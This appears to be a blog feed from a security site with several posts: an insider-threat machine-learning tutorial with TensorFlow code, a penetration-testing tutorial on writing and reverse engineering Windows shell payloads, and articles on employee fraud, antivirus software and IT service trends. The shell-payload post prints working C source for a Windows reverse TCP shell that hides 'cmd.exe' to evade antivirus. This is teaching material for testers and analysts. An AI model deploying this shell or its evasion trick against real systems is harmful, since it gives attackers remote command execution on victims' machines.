  • It also shows that even though action and vector were first marked 'green' as better input selections for unique single-event records, the opposite was true for insider threat scenarios, where we need to think about multiple events per incident/alert. In the optimized model, many of the weights and tokens used were time-correlation specific along with action token words
  • It also tells us that our base data quality for this set is rather low, and that we would need additional context, and possibly sentiment analysis per user for each unique event, such as the HR 'OCEAN' metrics in the psychometric.csv file. Using tokens through NLP, we would possibly tune the set to include the mostly null column with the website descriptor words from the original datasets, and maybe files.csv, which would have to be merged into our training set using time and transaction ID as keys when performing those joins in our data pre-processing

Deploying your model optimized (or not)

While this section does not show screenshots, the last step in the RapidMiner studio is to deploy the optimized or non-optimized model of your choosing. Deploying locally in the context of studio won't do much for you other than to re-use a model that you really like and to load new data through the interactions of the Studio application. You would need RapidMiner Server to make local or remote deployments automated to integrate with production applications. We do not illustrate such steps here, but there is great documentation on their site at: https://docs.rapidminer.com/latest/studio/guided/deployments/

But what about Tensorflow 2.0 and Keras?

Maybe RapidMiner Studio wasn't for us, and everyone talks about Tensorflow (TF) as one of the leading solutions. But TF does not have a GUI. The new TF v2.0 has the Keras API as part of the installation, which makes creating the neural net layers much easier, along with getting your data ingested from a Pandas DataFrame into model execution. Let's get started.

As you recall from our manual steps, we start with data pre-processing. We re-use the same scenario 2 dataset and will use basic label encoding, like we did with our non-optimized model in RapidMiner Studio, to show you the comparison in methods and the fact that it's all statistics at the end of the day, based on algorithmic functions converted into libraries. Reusing the screenshot, remember that we already did some manual pre-processing work and converted the insiderthreat, vector, and date columns into numerical category values, like so:


I've placed a copy of the semi-scrubbed data on GitHub if you wish to review the intermediate dataset prior to running the Python script to pre-process it further:


Let's examine the python code to help us get to the final state we want which is:


The code can be copied below:

import numpy as np
import pandas as pd
import tensorflow as tf
from tensorflow import feature_column
from tensorflow.keras import layers
from sklearn.model_selection import train_test_split
from pandas.api.types import CategoricalDtype


#Use Pandas to create a dataframe
#In windows to get file from path other than same run directory see:
#https://stackoverflow.com/questions/16952632/read-a-csv-into-pandas-from-f-drive-on-windows-7


URL = 'https://raw.githubusercontent.com/dc401/tensorflow-insiderthreat/master/scenario2-training-dataset-transformed-tf.csv'
dataframe = pd.read_csv(URL)
#print(dataframe.head())


#show dataframe details for column types
#print(dataframe.info())


#print(pd.unique(dataframe['user']))
#https://pbpython.com/categorical-encoding.html
dataframe["user"] = dataframe["user"].astype('category')
dataframe["source"] = dataframe["source"].astype('category')
dataframe["action"] = dataframe["action"].astype('category')
dataframe["user_cat"] = dataframe["user"].cat.codes
dataframe["source_cat"] = dataframe["source"].cat.codes
dataframe["action_cat"] = dataframe["action"].cat.codes


#print(dataframe.info())
#print(dataframe.head())


#save dataframe with new columns for future data mapping
dataframe.to_csv('dataframe-export-allcolumns.csv')


#remove old columns
del dataframe["user"]
del dataframe["source"]
del dataframe["action"]
#restore original names of columns
dataframe.rename(columns={"user_cat": "user", "source_cat": "source", "action_cat": "action"}, inplace=True)
print(dataframe.head())
print(dataframe.info())


#save dataframe cleaned up
dataframe.to_csv('dataframe-export-int-cleaned.csv')




#Split the dataframe into train, validation, and test
train, test = train_test_split(dataframe, test_size=0.2)
train, val = train_test_split(train, test_size=0.2)
print(len(train), 'train examples')
print(len(val), 'validation examples')
print(len(test), 'test examples')


#Create an input pipeline using tf.data
# A utility method to create a tf.data dataset from a Pandas Dataframe
def df_to_dataset(dataframe, shuffle=True, batch_size=32):
  dataframe = dataframe.copy()
  labels = dataframe.pop('insiderthreat')
  ds = tf.data.Dataset.from_tensor_slices((dict(dataframe), labels))
  if shuffle:
    ds = ds.shuffle(buffer_size=len(dataframe))
  ds = ds.batch(batch_size)
  return ds




#choose columns needed for calculations (features)
feature_columns = []
for header in ["vector", "date", "user", "source", "action"]:
    feature_columns.append(feature_column.numeric_column(header))


#create feature layer
feature_layer = tf.keras.layers.DenseFeatures(feature_columns)


#set batch size pipeline
batch_size = 32
train_ds = df_to_dataset(train, batch_size=batch_size)
val_ds = df_to_dataset(val, shuffle=False, batch_size=batch_size)
test_ds = df_to_dataset(test, shuffle=False, batch_size=batch_size)


#create compile and train model
model = tf.keras.Sequential([
  feature_layer,
  layers.Dense(128, activation='relu'),
  layers.Dense(128, activation='relu'),
  layers.Dense(1)
])


model.compile(optimizer='adam',
              loss=tf.keras.losses.BinaryCrossentropy(from_logits=True),
              metrics=['accuracy'])


model.fit(train_ds,
          validation_data=val_ds,
          epochs=5)


loss, accuracy = model.evaluate(test_ds)
print("Accuracy", accuracy)

In our scenario, we ingest the data from GitHub. I've included in the comments the method of reading from a file local to your disk. One thing to point out is that we use the Pandas DataFrame construct and methods to manipulate the columns using label encoding for the input. Note that this is not the optimized approach that RapidMiner Studio reported to us.

We're still using our same feature set columns in the second round of modeling we re-ran in the previous screens; but this time in Tensorflow for method demonstration.


Note in the above that there is an error: vector still shows 'object' in the DType. I was pulling my hair out until I found I needed to update the dataset, as I had not captured all the values in the vector column as numerical categories like I originally thought. Apparently, I was missing one. Once this was corrected and the errors were gone, the model training ran without a problem.

Unlike RapidMiner Studio, we don't just hand over one large training set and let the system do it for us. We must divide the training set into smaller pieces run through in batches: a subset used to train the model on known-correct true/false insider threat labels, and a reserved split of the remainder used only for validation.


Next we need to choose our feature columns, which again are the 'non-optimized' 5 encoded columns of data. We use a sampling batch size of 32 in each round of validation (epoch) for the pipeline, as defined early on.


Note that we have not executed anything related to the tensors or even created a model yet. This is all just data prep and building the 'pipeline' that feeds the tensors. Below is where we create the model with the layers in sequential format using Keras; we compile the model using Google TF's tutorial demo optimizer and loss functions, with an emphasis on accuracy. We fit and validate the model over 5 epochs and then print the results.

Welcome to the remaining 10% of your journey in applying AI to your insider threat data set!


Let's run it, and, well, now we see accuracy of around 61%, like last time! So again, this just proves that the majority of your outcome comes from the data science process itself and the quality of the pre-processing, tuning, and data, not so much from which core software solution you go with. Without optimizing and testing multiple models across varying feature sets, our primitive models will be at best 10% better than the random chance sampling that a human analyst may or may not catch reviewing the same data.


Where is the ROI for AI in Cyber Security

For simple project tasks that can be accomplished on individual events as an alert vs. an incident using non-domain experts, AI-enabled defenders in SOCs or threat hunting teams can achieve ROI faster on things that are considered anomalous, or not, against baseline data. Examples include anomalous user agent strings that may show C2 infections, or K-means or KNN clustering based on cyber threat intelligence IOCs that may show specific APT similarities. There are some great curated lists on GitHub that may give your team ideas on what else they can pursue with simple methods like the ones we've demonstrated in this article. Whatever software solution you elect to use, chances are that your alert payloads really need NLP applied and an appropriately sized neural network to enable more accurate modeling. Feel free to modify our base Python template and try it out yourself.

Comparing the ~60% accuracy vs. other real-world cyber use cases

I have to admit, I was pretty disappointed in myself at first, even though we knew this was not a tuned model given the labels and input selection I had. But when we cross-compare it with other, more complex datasets and models in communities such as Kaggle, it really isn't as bad as we first thought. Microsoft hosted a malware detection competition and provided enriched datasets. The highest competition scores showed 67% prediction accuracy, and this was in 2019 with over 2400 teams competing. One member shared their code, which scored 63% and was released free to the public as a great template if you want to investigate further; it is titled LightGBM.


Compared to the leaderboard, the public-facing solution was only 5% "worse." Is a 5% difference a huge amount in the world of data science? Yes (though it depends on how you measure confidence levels). So out of 2400+ teams, the best model achieved an accuracy of ~68%. But from a budgeting ROI standpoint, when a CISO asks for their next FY's CAPEX, 68% isn't going to cut it for most security programs.

While somewhat discouraging, it's important to remember that there are dedicated data science and dev-ops professionals who spend their entire careers doing this to get models up to the 95% or better range. To achieve that, tons of model testing, additional data, and additional feature set extraction is required (as we saw RapidMiner Studio doing automatically for us).

Where do we go from here for applying AI to insider threats?

Obviously, this is a complex task. Researchers at Deakin University published a paper called "Image-Based Feature Representation for Insider Threat Classification," which was mentioned briefly earlier in the article. They discuss the measures they took to create a feature set based on an extended amount of data from the same US-CERT CMU dataset; they created 'images' out of it that can be used for prediction classification, achieving 98% accuracy.

Within the paper, the researchers also discuss prior models such as 'BAIT' for insider threat, which achieved at best 70% accuracy, also on imbalanced data. Security programs with enough budget can have in-house models built from scratch with the help of data scientists and dev-ops engineers who can turn this research paper into applicable code.

How can cyber defenders get better at AI and begin to develop skills in house?

Focus less on the solution and more on the data science and pre-processing. I took the EdX Data8x courseware (3 courses in total), and the referenced book (also free) provides great details and methods anyone can use to properly examine data and know what they're looking at during the process. This course set, among others, can really augment and enhance existing cyber security skills to prepare us to do things like:

  • Evaluate vendors providing 'AI' enabled services and solutions on their actual effectiveness such as asking questions into what data pre-processing, feature sets, model architecture and optimization functions are used
  • Build use cases and augment their SOC or threat hunt programs with more informed choices of AI specific modeling on what is considered anomalous
  • Be able to pipeline and automate high quality data into proven tried-and-true models for highly effective alerting and response

Closing

I hope you've enjoyed this article and tutorial brief on feeding insider threat data (or really any dataset) into a neural network using two different solutions. If you're interested in professional services or an MSSP to bolster your organization's cyber security, please feel free to contact us at www.scissecurity.com

Original post: https://www.linkedin.com/pulse/getting-hands-n-ai-cyber-security-professionals-dennis-chow-mba/?trackingId=

Please note: All future articles will be on Medium. Please follow https://medium.com/@dw.chow for updates.

The post Insider Threat Detection with AI Using Tensorflow and RapidMiner Studio | By Dennis Chow appeared first on eForensics.

Analyze Binaries in Ghidra to Write Shell Payload in C for Windows Systems | By Dennis Chow


In this article, we’ll go over some example C code that is Windows x86 compatible and analyze binaries using Ghidra to help you write or improve your shell code skills by creating the payload first. The practical applications of malware analysis and reverse engineering can help penetration testers improve their evasion techniques and achieve command execution on Windows systems without Linux (or ported) tools. We’ll examine samples using native Windows libraries, compilers, a C-based shell payload, and a Metasploit (MSFvenom) payload for Windows. Are you ready? Let’s dive right in!

Disclaimer: The methods, code examples, and techniques mentioned throughout this article are for educational purposes only. The author takes no responsibility for any unauthorized activities performed using the information in this article. All code or compiled binaries are provided ‘as is’ with no expressed warranty.

Feel free to download and install these tools and follow along in the article to practice your win32-ninja shell code skills with us.

Tools in Use:

Writing your first Win32 Compatible Shell Payload in C

Many cyber security professionals (including myself) aren’t experts in shell code creation nor the ancient C language. So when we do pen testing engagements, our go-to tools for shell payloads almost always include Metasploit, specifically MSFVenom, Veil, or some other C2 framework (in a post-Empire world) that generates the desired shell code for you. But these solutions, like any pre-made template, aren’t always perfect, and many vanilla payloads produced are caught by endpoint security solutions.

So why not write our own? Many tutorials you see focus on compiling or writing payloads for Linux. If we’re compromising and pivoting between Windows systems, we need to step it up. So let’s get our first C-code template ready to go down below:

	#include <stdlib.h>	// to use system()

	int main()
	{
		char command[100] = "calc.exe";
		system(command); // executes the calc.exe native path file
		return 0;
	}

In the above you see one of the simplest 'cmd only' forms of shell payload. It's not a full shell, but it's a starter template that uses native standard libraries so you can execute an external system call that will honor the Windows System32 directory path. It's quite obvious what happens in the above snippet.

Note: This payload is detected as 'malware' by Chrome and Google Drive services. Windows Defender, at the time of this writing on Windows 10, does not flag the compiled binary.

No alt text provided for this image

You might be wondering "who cares" about the above template. It serves as a base for us to compile to a binary and examine a very simple way to begin reverse engineering a standard portable executable, getting you comfortable with navigating Ghidra to find functions and trace references and variables in the decompiler window, as we'll see coming up.

Compile Your C Shell Payload in Windows

In our example template, we'll use Visual Studio (VS) since it's got nice colors and a GUI that make it easy to showcase. You can also use the common 'MSBuild' method by including the C file in an XML template, which can be compiled natively on most workstations. But let's use VS because I have screenshots.

No alt text provided for this image

Create a new project for a Win32 Console application. Ensure you've got the C++ extension installed. After the default solution files are generated, right click on the solution explorer and add a new source file. Instead of adding a C++ file with the extension (.cpp) call it (.c). The VS compiler will use the appropriate language compiler based on your extension.

Now paste your C source code, and you'll notice that if you try to build the solution, you may receive an error about the main function already being defined in another file. You'll have to remove (disable) the original default C/C++ file from the project solution so the compiler knows you won't use it, as shown below:

No alt text provided for this image

Now that we've prepped the environment, you can compile and build the solution. If you hit 'Ctrl+F5' it'll execute the binary as well, and you'll see calc.exe pop up. If you're like me, you may have started 'modifying' the shell code by adding different enhancements to try to make it more useful. Note that the use of insecure classic functions with potential buffer overflow conditions will show up as errors or warnings and prevent the build. You'll need to instruct the compiler's pre-processor to ignore these, as in the below image:

No alt text provided for this image

To do so, right click on your C file in solution explorer and set the configuration properties under 'preprocessor'. Edit the macros and add in (case sensitive) the warning bypass macros to the definitions field. Copy and paste the snippet below if you are running into this issue:

_CRT_SECURE_NO_WARNINGS
_CRT_SECURE_NO_DEPRECATE
_CRT_NONSTDC_NO_DEPRECATE
_WINSOCK_DEPRECATED_NO_WARNINGS

Congratulations, you've compiled your first Win32 C-source shell code. Let's analyze the binary in Ghidra so you can get a feel for what the decompiled code looks like when you DON'T have the source code. For example, imagine you managed to isolate a sweet piece of malware that did not get detected and you want to mimic its TTPs.

Using Ghidra to Search and Decompile

In this section, we're going to import the binary into Ghidra and start exploring the structure of our original C shell code so we can identify the main() function, where variables are loaded, and the system() execution, and compare it all to our source code.

When you first load the binary into Ghidra, you'll want to use the default 'automatic analysis' settings (select YES) before you get to the main screen. From the main view, find the left panel under functions/symbols and locate the 'entry' point, as you often won't see the main() function properly parsed.

No alt text provided for this image

Hit up the 'entry' icon in the symbol tree (functions) menu towards your bottom left pane and click on it. Your main code viewer window will jump to the entry point where the program begins to execute your main function.

No alt text provided for this image

Also note, to the right in the decompiler pane, a familiar-looking main() structure that's been labeled as a function at a memory address, followed by the return. We'll rename this to main() by right clicking on the function label. This denotes the main structure of our code.

No alt text provided for this image

You can further explore other functions from potentially called DLL imports, and non-obfuscated strings, by examining the symbol tree (if the binary wasn't already stripped). Since we already know the source code, let's look for 'calc.exe', since we know that's what we executed in the payload. *Yes, I know: you don't have that luxury examining other pieces of malware or binary shell payloads; we'll examine how to trace and map functions more effectively in our upcoming examples. Hold tight!*

No alt text provided for this image

Double clicking on the location address for calc in the string search window will jump us to the data segment (DS) section. To our right (highlighted in yellow), we also see local variables in the decompiler being listed and pushed onto the stack. If you look carefully, it is indeed Win32 x86 Intel architecture, as the bytes are stored in little endian. It's also 4 bytes across, a proper 32-bit value (referenced as a DWORD in Windows), as validated by converting the hex below:

No alt text provided for this image

The careful analyst will also observe the varying system-call-related functions surrounding our string pushed onto the stack. Let's take a closer look:

No alt text provided for this image

What you see above are the subroutines in the main function. We see the data 'calc.exe' being pushed onto the stack frame and set in memory by 'memset()', followed by our famous 'system()' call. Since this is an imperfect decompile of the C code, we reference the library methods to see how the actual structure of the source might look (if we didn't already have the source code):

// C program to demonstrate working of memset() 
#include <stdio.h> 
#include <string.h> 
  
int main() 
{ 
    char str[50] = "GeeksForGeeks is for programming geeks."; 
    printf("\nBefore memset(): %s\n", str); 
  
    // Fill 8 characters starting from str[13] with '.' 
    memset(str + 13, '.', 8*sizeof(char)); 
  
    printf("After memset():  %s", str); 
    return 0; 
} 

In the above example from the GeeksforGeeks.org site, we see that memset was explicitly called; in our code, it was simply implied after setting up the construct and variable "char command[100] = "calc.exe";". The documentation says memset is indeed filling our buffer in memory. Now let's get to the actual 'evil' execution of our intended payload via system().

// A C++ program that pauses screen at the end in Windows OS 
#include <iostream> 
using namespace std; 
int main () 
{ 
    cout << "Hello World!" << endl; 
    system("pause"); 
    return 0; 
} 

In the above, the external reference also shows how the system() syntax is used: it simply takes in a string argument, and we see our standard return statement from the routine.

Examining a more complex sample (reverse_tcp_shell)

In this next example, we will examine a slightly modified version of a reverse TCP shell payload written in C and designed to compile and run natively for Win32. Endpoint (antivirus) solutions may detect vanilla msfvenom and other non-tuned payloads, but not necessarily this one. The original shell.c is found here, where there are a few typos that needed adjusting. The author is "Yahav N. Hoffmann" and it was written in 2016, yet the compiled binary still wasn't flagged by my Windows Defender on Windows 10 in May of 2020! Amazing what custom shell coding can do. Some of his methods are similarly demonstrated in another piece of shell code authored by 'paranoidninja', located here (if you wish to read more on the evasion techniques).

No alt text provided for this image

And yes, the code works as shown in my PCAP runtime below:

No alt text provided for this image

For now, use the one I have hosted on my GitHub for the purposes of this demonstration and for syntax-corrected compiling ease. Here's our code template to reference:

//Another great template can be found here
//https://0xdarkvortex.dev/index.php/2018/09/04/malware-on-steroids-part-1-simple-cmd-reverse-shell/


//Original location
//https://github.com/infoskirmish/Window-Tools/blob/master/Simple%20Reverse%20Shell/shell.c
/* Windows Reverse Shell
Test under windows 7 with AVG Free Edition.
Author: Ma~Far$ (a.k.a. Yahav N. Hoffmann)
Writen 2016 - Modified 2016
This program is open source you can copy and modify, but please keep author credit!
Made a bit more stealthy by infoskirmish.com - 2017
*/

#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32") //dc401 corrected typo of w2 to ws2

WSADATA wsaData;
SOCKET Winsock;
SOCKET Sock;
struct sockaddr_in hax;
char aip_addr[16];
STARTUPINFO ini_processo;
PROCESS_INFORMATION processo_info;


int main(int argc, char* argv[])
{
	WSAStartup(MAKEWORD(2, 2), &wsaData);
	Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);

	if (argv[1] == NULL) {
		exit(1);
	}

	struct hostent* host;
	host = gethostbyname(argv[1]);
	strcpy(aip_addr, inet_ntoa(*((struct in_addr*)host->h_addr)));

	hax.sin_family = AF_INET;
	hax.sin_port = htons(atoi(argv[2]));
	hax.sin_addr.s_addr = inet_addr(aip_addr);

	WSAConnect(Winsock, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);
	if (WSAGetLastError() == 0) {

		memset(&ini_processo, 0, sizeof(ini_processo));

		ini_processo.cb = sizeof(ini_processo);
		ini_processo.dwFlags = STARTF_USESTDHANDLES;
		ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;

		char* myArray[4] = { "cm", "d.e", "x", "e" };
		char command[8] = "";
		snprintf(command, sizeof(command), "%s%s%s%s", myArray[0], myArray[1], myArray[2], myArray[3]);

		CreateProcess(NULL, command, NULL, NULL, TRUE, 0, NULL, NULL, &ini_processo, &processo_info);
		exit(0);
	}
	else {
		exit(0);
	}
}

That looks exciting: we have attempted 'cmd.exe' evasion by splitting it into an array of format-string fragments and concatenating them later; we also have if/else branching conditions and CLI-level arguments we can process. Now that we've examined the code, what does it look like under a decompiler, assuming we don't have the source?

Open up Ghidra again and let's hit the entry point, identify the main() function, and begin tracing our functions down the rabbit hole. *Don't worry, we won't be 'cheating' with specific string searches. We will examine the symbols and strings for any interesting keywords, though.*

No alt text provided for this image

Wow, that's a lot of unique strings and good information about the variables and function uses in the data segment (DS) of our binary. Do you recognize the famous "%s%s%s%s" (four format specifiers, one for each string fragment)? I hope you do! But let's get more realistic and start thinking about how we can examine the decompiled pseudo code in Ghidra. Let's open up the function graph window, similar to how you would with the space bar in IDA Pro or x64dbg's graph view.

No alt text provided for this image

If you do a side-by-side comparison, you can see the conditional statements and potential loops from our source code in the graph view. This will help you determine where there might be subroutines used, and also focus on true/false conditions that you'll want to investigate when creating a fork or a patch to some C code. Another tool we can use is 'references' (xref, reachable with the 'x' hot key in IDA).

This lets you map functions or variables that have been called or mentioned in other functions or portions of the code. As you can imagine, jumping in and out of varying functions can get very complex fast! So for a pure compiled shell code payload, it's best to start top-down from the OEP and main() function and dig into what would likely be used, such as system calls and socket creation. The great thing about Ghidra is that it visualizes this for you if you right click, scroll to the references sub-menu, and select the open call tree option.

No alt text provided for this image

In the above, I've highlighted the function call tree windows for incoming and outgoing calls relative to our main() function that we renamed earlier. You'll also notice lots of 'XREF' (referenced) mentions of the same function (main) memory address space and their appropriate IO in memory (read/write, in colors). What's also very interesting are all the identified native Windows C functions and their outgoing calls. Given that we have a reverse shell, I might be inclined to start investigating the WSASocketW calls first.

But, before we do that, remember when we discussed format strings? Let's revisit that code comparison and how it also looks in the C decompiler once more with rigor:

No alt text provided for this image

In the above, we compare our original source side by side with the decompiler window, and we see clues that Ghidra couldn't parse the snprintf() function as easily. Even still, this gives you clues as to which functions might be used based on the data arguments. Before leaving the screen, take note of the CreateProcess function, which is not C specific but actually Windows specific, and note how it wasn't decoded. Other solutions such as IDA Pro might already have this decoded for you, but when learning to write shell code from scratch in C, this is great practice for your API research skills.

No alt text provided for this image

In the last portion of this example, we examine another part of our shell code construct. It takes two (2) arguments, an IP and a port, according to our source code. Notice in the decompiler that Ghidra gets very close to showing you the useful syntax and the number of arguments. We also know that this is part of the main function, as it is loaded in a position right after the entry point of the application.

What about the metasploit payloads from msfvenom?

We don't have any screenshots of our examination of the basic Windows (non-staged) bind shell and reverse TCP shells. However, when we examined them under Ghidra, you really get a sense of just how much work the teams at Rapid7 and the security community behind the Metasploit framework have put into making them difficult to detect and robust in their error and condition handling.

We weren't able to easily jump between sections and showcase easy C structures and functions to reference (which is, honestly, kind of good for AV detection anyway) after exporting (using -f exe from msfvenom). What this means is that you as a seasoned pen tester need to practice DFIR and REM skills. I've personally enjoyed my GREM certification, and it complements the GXPN very well in exercising the skills needed to develop shellcode on your own.

Closing

I hope you've enjoyed this little preview into how powerful Ghidra is and how you can exercise malware analysis and reverse engineering skills to complement and take your shell code writing skills to the next level for Windows systems. There's so much more reading available for those wanting to extend their knowledge beyond this article. I encourage you to visit the links below in your spare time.

Feel free to follow, clap, like, or send me general feedback. If your organization is in need of an MSSP or other security subject matter expertise, find us online at www.scissecurity.com

Additional Resources and Examples

There’s more reading if you wish to learn more and want additional templates to choose your initial reversing from. You aren’t just limited to analyzing C-based payloads; there are many other payloads and solutions that you can gather more ideas from.

Using Slack as a C2 Channel

Analyzing meterpreter payload with Ghidra

MultiOS Reverse Shell made in .NET (you can always use dotPeek to decompile the code if you only have a binary, because .NET compiles to an intermediate language)

MSbuild XML Template for Shellcode (C source ready)

Compile C code entirely from Windows CLI

Original link: https://www.linkedin.com/pulse/analyze-binaries-ghidra-write-shell-code-c-dennis-chow-mba/?trackingId=ByQoAw2HSqeq3%2FZAPduuAg%3D%3D

Please note: All future articles will be on Medium. Please follow https://medium.com/@dw.chow for updates.

The post Analyze Binaries in Ghidra to Write Shell Payload in C for Windows Systems | By Dennis Chow appeared first on eForensics.

How Businesses Can Avoid Internal Fraud

An employer never expects an employee he or she hires to one day bring down the company, but it happens all the time when an employee decides to commit fraud. Internal fraud is a huge issue that requires employers to react.

If you want to stop fraud in your business, then you need to act now. It starts by understanding how fraud can impact your company, and then it requires taking the proper steps to make sure no employee will ever have the chance to do anything fraudulent.

The Dangers of Fraud

If you have a small or medium-sized business, then you are most at risk for internal fraud. Companies of this size often have a sense of family where employees can easily get away with more nefarious activities because nobody expects it to happen.

While it is perfectly fine to be close with employees and encourage camaraderie, you still need to maintain professionalism. You need to understand that you can't always trust everyone, even if they seem to be a wonderful person. It is often the employees whom everyone loves and thinks are the nicest people ever who are the ones stealing from you.

There are three general types of internal fraud:

  • Theft
  • Misappropriation of assets
  • Financial statement fraud

These activities could include stealing cash or property, making fake claims, getting kickbacks, or creating schemes to skim money from accounts. Fraud may also include larceny, fraudulent disbursements, embezzlement, and stealing customer lists or trade secrets.

Signs of a Bad Apple

SCORE suggests familiarizing yourself with the common signs that someone may be a risk to your business. Things to watch out for include:

  • Suddenly working late or overtime
  • Substance abuse
  • Financial troubles
  • Issues with changes to policies
  • Living above means
  • Gambling addictions
  • Side jobs similar to your business

Seeing multiple signals or noticing these behaviors as something new with an employee could point to something going on. Of course, you do want to do some investigation before assuming the person is involved with criminal actions. For example, if you start to notice someone working more overtime, then you want to see if there is a logical reason behind it. In many cases, there will be. So, avoid jumping to conclusions, but keep your eyes open so you don't miss obvious signs that you have a problem.

6 Steps To Take To Stop Fraud

While it may be tough to prevent all fraud from occurring, there are things you can do to minimize the possibility. Taking a proactive stance will allow you to stay on top of things, and should an employee decide to engage in criminal activities, you will have the ability to catch him or her before your business suffers too much of a loss.

1. Set Checks and Balances

You need to institute a system within your business where work runs through multiple employees. Leaving one employee to manage everything is a huge risk. You need checks and balances to spot issues. When one employee checks the work of another, you can more easily identify oddities and manage accounts better.

2. Make the Rules Clear

Being upfront with employees and letting them know you will not tolerate internal fraud can set the right environment in which nobody will even try to do something nefarious. Make the rules clear by providing employees with written policies for ethics and fraud. Also, make sure you outline what will happen if you discover any type of fraudulent activity.

Do not forget to set a good example and show from the top down how you follow the rules. If you relax the rules for even one person, it opens the door for others to follow suit. Then, all the rules become a moot point because employees see you don't take them seriously.

3. Make Employees Take Time Off

Enforce vacation and time-off policies. Letting employees overwork opens the door to opportunities to conceal wrongdoing. Also, when you give employees time off and make them take it, it can make it much easier to spot a problem.

4. Reduce Risks

You have many ways to reduce the risk of fraud in your business starting with surprise audits. Corporate investigations allow you to get a real look at what your employees do and make it simple to spot issues.

You should also limit access to credit cards and accounts so you can more easily monitor them. Control receipts for your business, and always check them for validity. Also, track your checks and watch for missing numbers. Keep good control over inventory as well.

5. Implement Training

Train your employees on fraud prevention and detection. When everyone knows what to watch for, it makes it easier to control the situation. Most people will not even try to do something if they know that the chances of getting caught are high. When you train your staff, it creates a group mentality that fraud is not acceptable, so they will be highly likely to let you know if something is amiss.

6. Follow Through

You have to be strong and firm when it comes to fraud, which means that if anyone comes to you with concerns, you investigate them fully. Always follow up because if you let reports go, that just tells your employees that you aren't serious about stopping the activities. It essentially gives those who are doing wrong the green light to keep doing it.

Also, you need to make it easy for people to make reports. Make sure that the system you use allows them to do so without everyone else knowing they did it. People often will not want the spotlight on them as the person who revealed what was going on, and if they don't feel they can make a report privately, they simply won't do it.

Keep Your Business Safe

It is fully in your hands to protect your company from internal fraud. All it takes is committing to it and making sure that you send the right messages to your employees. Create a work environment of zero tolerance, and you can stop fraud in its tracks.

Jeremy Biberdorf
modestmoney.com

Connect with me on social media: Twitter | Facebook | LinkedIn

The post How Businesses Can Avoid Internal Fraud appeared first on eForensics.


Essential Features of Reliable Antivirus Software

| sponsored post |

Antivirus software is just as important today as it’s ever been. With so many providers to choose from, discover the key features to look out for here.

What to Look For in the Best Antivirus Software

Though technology is always developing, we haven’t yet gotten to the point where our devices and web browsing can no longer be targets of hacking and malware. The truth is, we likely never will. That’s why, now more than ever, it’s essential to have high-quality antivirus software running at all times on phones, laptops, and computers. 

As the devices we use grow slicker and smarter, so do the techniques and tools of the modern-day hacker. Without antivirus, and the various other programs we need to ensure online safety, your laptop could be loaded with keyloggers, malware, or something equally nefarious, and discovering and removing these threats is a lot tougher. 

Unfortunately, much like with hosting and VPNs, the market is saturated with subpar providers and those that don’t deliver on their promises. That being said, there are telltale signs that you can look out for when picking your first antivirus or migrating from an existing subscription. Keep reading to find out what they are. 

Key Features to Look Out For 

Price: It’s really not that difficult to find an antivirus tool that’s effective but also works for your budget. Chances are, several of the providers you compare will be running some kind of promotion or deal. If they’re not, you just need to shop around until you find a price that works. 

While some are rather restrictive in their options, certain providers let you pay monthly or with terms ranging from 1-3 years. To make it even cheaper, you can tailor your plan to protection for just one device. If you’d rather not pay at all, there are some decent free antiviruses out there, from brands like Kaspersky and Bitdefender, but they come with less protection than the paid alternatives. 

Download Protection: Sometimes, there’s no easy way of knowing what’s sneaking its way into our downloads. Depending on what you’re downloading and from where, there’s a good chance that some kind of adware or malware has been included. Oftentimes, though the software is legitimate, the site hosting it might look to include files that don’t belong, that can be used to monitor your activity and steal logins and card details. 

If you accidentally download something you shouldn’t, the antivirus will quickly point this out and prevent the file from installing on your computer.

Real-Time Monitoring: The best security software will always include real-time protection. This is key to keeping you safe on the web whether you’re on the move or at home. Essentially, this means that your antivirus software will detect any malicious programs and websites in real-time, so you’ll always be protected.

This feature runs perfectly in the background so you won’t need to set anything up. Plus, it won’t use much processing power at all. You can just continue using the internet the way you usually would and expect notifications on your desktop should anything go wrong.  

Malware Scanning/Threat Removal: Knowing whether or not you already have threats on your device is half the problem of not owning an antivirus. If you’re experiencing performance interruptions, unusual behavior, or an inexplicable amount of RAM being used, it’s likely that you already have some kind of ransomware or bloatware. 

Having an antivirus installed means that you can easily identify problem files as they invade your devices, making damage control much more likely. 

Antiviruses take the stress out of removing bad files too, not just scanning for them. Once nefarious files and their locations are found, you can remove and quarantine them effortlessly.

Email Scanning: Our email inboxes are one of the biggest targets for phishing scams, monetary theft, and malware. According to a recent study, of all the data breaches in 2019, 32% of them were through phishing alone. Emails are constructed to look just like they would from your bank and the social media sites you use, making it all too easy to fall victim to these kinds of scams. 

Whether it’s to get your login details or to make you install malicious files, these kinds of emails can easily be spotted with an antivirus. Your software will scan all emails based on the sender, the files attached, and more, ensuring you don’t get exposed. 

Summary  

Antivirus software is just one of the sophisticated tools available to combat online threats. Though it’s always better to use alongside other useful programs, just installing an antivirus alone provides a much greater defense than having nothing at all. When deciding which provider to go with, remember to keep an eye out for these important features. 

The post Essential Features of Reliable Antivirus Software appeared first on eForensics.

ITSM Solutions Security Trends to Watch out for

| sponsored post |

How is ITSM going to change over the next year or so? Many observers have pointed out that most of the changes will not come to fruition quickly. Developments such as AI are not going to take the field by storm as has been prophesied, but they will find their place in the landscape overall. This is one of the many reasons why a lot of the trends from 2019 are going to carry through into 2020. To find out more, read on.

AI Solutions are Going to Focus on Augmented Intelligence

For a lot of organisations, solutions based on AI are going to be an interesting consideration for quite some time. AI has a tremendous amount of long-term potential, but at the end of the day, not everybody is ready for what it has to offer. The technology is certainly mature enough for any organisation to see the benefits; chatbots are one obvious use case. Even so, there hasn't been a huge adoption rate. Why? A lot of it comes down to the fact that chatbots are most often adopted by bigger organisations, because those organisations have enough data and call volume to train their chatbots to recognise trends and even anticipate the needs of their end-users. The more repetitive your calls are, the easier and faster it is to implement a chatbot. Take SysAid, for example: they have made leaps and bounds in the industry, which is a testament to how much this type of tech is being used, even though the adoption rate is slower than most expected.

Smart Automation Solutions are Playing Catchup

